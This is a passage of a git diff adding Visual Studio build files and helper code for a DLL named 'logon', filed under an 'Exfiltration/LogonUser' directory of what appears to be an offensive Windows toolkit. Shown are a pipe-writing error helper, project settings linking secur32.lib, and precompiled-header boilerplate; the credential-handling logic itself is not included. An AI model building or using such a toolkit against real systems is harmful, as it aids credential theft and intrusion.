uniStr->Length = (USHORT)size; + uniStr->MaximumLength = (USHORT)size; + uniStr->Buffer = (PWSTR)address; + memcpy(address, str, size); + return size; +} + +void WriteErrorToPipe(string errorMsg, HANDLE pipe) +{ + const char* error = errorMsg.c_str(); + DWORD bytesWritten = 0; + WriteFile(pipe, error, strlen(error), &bytesWritten, NULL); +}
\ No newline at end of file diff --git a/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj new file mode 100644 index 0000000..7fb078b --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>logon</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="logon.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters new file mode 100644 index 0000000..b63ba3c --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters @@ -0,0 +1,39 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="targetver.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ClCompile Include="stdafx.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="logon.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="dllmain.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp b/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp new file mode 100644 index 0000000..696fbfb --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// logon.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/Exfiltration/LogonUser/LogonUser/logon/stdafx.h b/Exfiltration/LogonUser/LogonUser/logon/stdafx.h new file mode 100644 index 0000000..d8612f0 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/stdafx.h @@ -0,0 +1,25 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers +// Windows Header Files: +#include "targetver.h" +#include <stdio.h> +#include <tchar.h> +#include <iostream> +#include <string> +#include <fstream> +#include <ostream> +#include <mutex> +#include <Windows.h> +#include <NTSecAPI.h> + + + +// TODO: reference additional headers your program requires here diff --git a/Exfiltration/LogonUser/LogonUser/logon/targetver.h b/Exfiltration/LogonUser/LogonUser/logon/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> |